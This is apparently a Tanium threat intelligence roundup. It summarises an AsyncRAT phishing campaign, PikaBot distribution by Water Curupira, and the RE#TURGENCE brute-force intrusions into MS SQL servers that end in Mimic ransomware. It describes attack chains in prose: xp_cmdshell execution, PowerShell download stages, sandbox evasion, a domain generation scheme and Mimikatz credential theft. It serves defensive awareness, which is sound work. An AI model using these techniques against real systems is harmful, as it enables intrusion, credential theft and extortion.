CTI Roundup: AsyncRAT, PikaBot Malware, and MS SQL Servers Under Attack
AsyncRAT appears in a new campaign, Water Curupira distributes PikaBot loader malware, and Turkish hackers exploit global MS SQL servers
This week, CTI investigates a new campaign that has been observed delivering AsyncRAT. Next, CTI explains how a threat actor known as Water Curupira is actively distributing the PikaBot loader malware via spam campaigns. CTI wraps up with a look at a financially motivated campaign named RE#TURGENCE that targets insecure Microsoft SQL servers around the globe.
1. AsyncRAT appears in a new campaign
AT&T Alien Labs has discovered a new campaign that delivers AsyncRAT to victims. For 11 months, the threat actor behind the campaign has been delivering the malware via an initial JavaScript file embedded within a phishing page. Researchers have uncovered over 300 samples and more than 100 domains highlighting the actor’s persistence.
What is AsyncRAT?
AsyncRAT has been around since at least 2019 when it was released as an open-source remote access tool. The tool is still available today on GitHub, making it a very commonly used RAT among threat actors. It is known for keylogging, exfiltration techniques, and initial access staging for final payload delivery.
In September 2023, AT&T observed a spike in phishing emails targeting a set of individuals. The phishing emails contained a GIF attachment that would lead to a SVG file. The SVG file, in turn, led to the download of a highly obfuscated JavaScript file followed by obfuscated PowerShell scripts and a final execution of an AsyncRAT client.
Pivoting off patterns in the code enabled AT&T researchers to identify additional samples in this campaign, finding samples dating back to February 2023. The registration of domains and discovery of AsyncRAT samples is ongoing.
Technical analysis
- The AsyncRAT loader has multiple stages that are obfuscated further by a C2 server that checks if the malware is running in a sandbox environment before deploying the main AsyncRAT payload.
- JavaScript files are delivered to the victim via malicious phishing web pages throughout the campaign. The files contain long strings that are commented out and have texts composed of randomly positioned words such as Melville, church, chapter and scottish.
- The script itself is highly obfuscated and has several functions to move the detectable commands/strings. The malware modifies the C2 and the URL every so often making detection more difficult. Further, the threat actor is seemingly trying to make a new version of the loader for every victim. The new files have new randomized variable names, again making detection difficult.
- If the C2 receives an invalid response and the malware is operating in a sandbox, it will redirect the request to Google or return a script that reaches out to a payload hosted on temp[.]sh. This domain hosts files for roughly three days and generates a new randomized URL path for each new uploaded file. The file at first glance appears to be an AsyncRAT client based on some of the antivirus detections. However, when decompiled, the RAT is actually a distraction for those that may be investigating the campaign. The sample is a decoy file that was made to resemble a RAT but does not contain a C2 server and contains strings such as LOL.
- If the C2 receives a valid response and the malware is not operating in a sandbox, it will serve a script with the next domain and URL obfuscated, which will later download AsyncRAT.
Network infrastructure
The code in this campaign is constantly changing and is heavily obfuscated, which can make detection difficult. As it relates to network infrastructure, the observed samples reached out to a range of domains, updating the list frequently.
While the domains changed often, they did share common characteristics like a TLD of .top and eight random alphanumeric characters. Additional shared characteristics included having Nicenic[.]net, Inc as the registrar, having a country code of South Africa, and always being created just a few days before its use.
A script led researchers to a new set of domains that did not have a hardcoded domain under the obfuscation like the previously observed sample. Instead, these samples had a script to calculate the domain based on the current date, allowing the samples to automatically change the C2 domain with time.
The domain generation algorithm (DGA) generated a seed using the day of the year and made some modifications to it to ensure a new domain is populated every seven days. This seed is then used to pick 15 letters from “a” to “n” to generate the domain. These patterns enable researchers to identify historical samples but also to build detections to identify future infrastructure.
Analyst comments from Tanium’s Cyber Threat Intelligence team
This campaign is a prime example of how determined threat actors can be, and how easy it can be for them to go unnoticed.
In many cases, developers will have the malware stop entirely and exit if it is determined to be in a sandbox so that it cannot be analyzed further. Interestingly, the developer in this campaign put extra time and effort into creating a decoy RAT that is essentially designed to waste an analyst’s time before realizing they were not fed the true malware.
This is an interesting case of a malware author putting extra time into something that doesn’t make the malware stealthier or more complex but simply aims to annoy analysts.
2. Water Curupira distributes PikaBot loader malware
A threat actor known as Water Curupira is actively distributing the PikaBot loader malware via spam campaigns.
This actor generally carries out campaigns for the purpose of dropping backdoors and often leads to ransomware attacks (mainly Black Basta).
The PikaBot loader exhibits many of the same behaviors as the notorious QBot and its rise in popularity seemingly coincides with the takedown of QBot.
Initial access
The attack begins with a malicious email that is delivered via thread hijacking. The email contains an attachment that is either a password-protected archive ZIP file containing an IMG file or a PDF file. If needed, the actor will include the password to the file in the email.
First stage
The archive attached to the email contains a heavily obfuscated JavaScript with a file size of more than 100 KB. When this is executed, the script will start to launch a series of commands. The script attempts execution using cmd.exe. If this is unsuccessful it will echo a designated string to the console and try to ping a specified target using the same string. If this fails, it will employ Curl.exe to download the PikaBot payload from an external server.
Another attack chain was also observed where the threat actor did not use a malicious script, but rather used an IMG file from the email’s PDF attachment that contained two additional files. These additional files were the PikaBot payload. The latter approach emerged towards the end of 2023.
PikaBot payload
Trend Micro analyzed a DLL file that was extracted from the archive in the first stage, finding it to be a sample of a 32-bit DLL file with 1515 exports. The DLL ultimately decrypts and executes a shellcode, that will decrypt yet another DLL file. This DLL file loads into memory and is eventually executed. The decrypted DLL file executes an anti-analysis routine that loads incorrect libraries and other irrelevant items to detect sandboxes.
After performing anti-analysis, the malware will load a set of PNG images that contain an encrypted piece of the core module. After decrypting them, the PikaBot injector creates a suspended process and injects the core module into it, while using indirect system calls to hide its injection.
PikaBot uses two functions to get the addresses of three needed APIs. These include GetProcAddress, LoadLibraryA, and HeapFree. The core module will check the system’s language and will stop execution if the language is found to be Russian or Ukrainian.
After ensuring that only one instance of itself is currently running, it will obtain details about the system to send to the C2. The malware will create a named pipe and use it to temporarily store additional information it gathers. Once the malware collects all the information it deems necessary, it will send it to an IP address appended with a specific URL.
Impact
Water Curupira often carries out campaigns that result in Black Basta ransomware. This is what makes PikaBot campaigns such a threat.
Trend Micro identified distinct clusters of Cobalt Strike beacons with over 70 C2 domains that lead to Black Basta and that could have been dropped via campaigns carried out by this threat actor.
Analyst comments from Tanium’s Cyber Threat Intelligence team
PikaBot infections tend to result in the deployment of Black Basta ransomware. As a result, PikaBot is not a threat to take lightly.
Further, numerous researchers have identified overlaps and potential connections between PikaBot and QBot. The timing of QBot being taken down around the same time that PikaBot rose in popularity is uncanny.
While we don’t know for sure if PikaBot is the new QBot, its potential ties to Black Basta ransomware and its sophisticated multi-stage nature make it a threat to be wary of.
3. Turkish hackers exploit global MS SQL servers
A financially motivated campaign, now codenamed RE#TURGENCE, is targeting insecure Microsoft SQL servers via brute forcing across the globe as a means of initial access. The campaign ends in one of two ways, the first being to sell the obtained access and the second being the delivery of ransomware.
The threat actor begins by brute forcing their way into a poorly secured MS SQL server, using the xp_cmdshell procedure to execute commands on the host. After executing code, they began to launch additional commands from the sqlservr.exe process.
- The first command calls cmd.exe and results in the downloading of a file, 189jt, from the attacker’s remote server and executes its contained code using a PowerShell invoke expression. The PowerShell script will download and run the next stage of the attack.
- The next PowerShell script contains an obfuscated Cobalt Strike payload that loads into the current running process. The obfuscation is focused on the DLL imports and Cobalt Strike payload which was found to contain hundreds of lines of combined variables and unneeded comment blocks. The Cobalt Strike Beacon was configured to inject into the Windows-native process, SndVol.exe. The threat actor then downloaded AnyDesk binaries from a mounted network share.
Credential access
The threat actor was observed downloading Mimikatz to the system using AnyDesk along with another batch script that was used to automate some of the Mimikatz commands.
The script is responsible for performing multiple functions. It first uses a known registry tweak to enable clear text credentials. After this it performs a few checks before executing Mimikatz from the appropriate subdirectory. The results of the Mimikatz dump are saved to a Mimikatz_dump.txt file.
Discovery and lateral movement
After using Mimikatz, the threat actor shifted to discovery efforts. They used AnyDesk to download the Advanced Port Scanner utility. This utility was used to check domain controller remote shares, get the hostname of a Hyper-V VM, test and run psexec.exe on a domain controller, test and use RDP, and more. A few days later, the threat actor was able to move laterally to two other machines in the network. The threat actor used psexec to open a new session to a domain controller with a password that was obtained from the Mimikatz dump. Using this account, they were able to move to additional machines.
Impact
After moving to a few additional machines, the threat actor used AnyDesk to download a ransomware payload as red25.exe. The payload is a self-extracting archive that extracts and runs the final ransomware payload. The ransomware used in this campaign is Mimic ransomware. Mimic ransomware makes use of legitimate apps to query and locate files to be encrypted.
After completing its encryption process, the ransomware drops the encryption/payment notice to the victim. The ransomware was ultimately manually executed by the threat actors on the MS SQL server first, then a domain controller, then other domain-joined hosts.
Analyst comments from Tanium’s Cyber Threat Intelligence team
The practice of targeting poorly secured MS SQL servers does not appear to be going away soon, largely because it continues to be fruitful for threat actors.
That aside, this threat actor relies heavily on the use of AnyDesk for multiple stages of the attack. This underscores how common it is becoming for threat actors to abuse legitimate tools in their operations, and therefore how important it is for defenders to monitor.
Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum and start a conversation.
For further reading, catch up on our recent cyber threat intelligence roundups.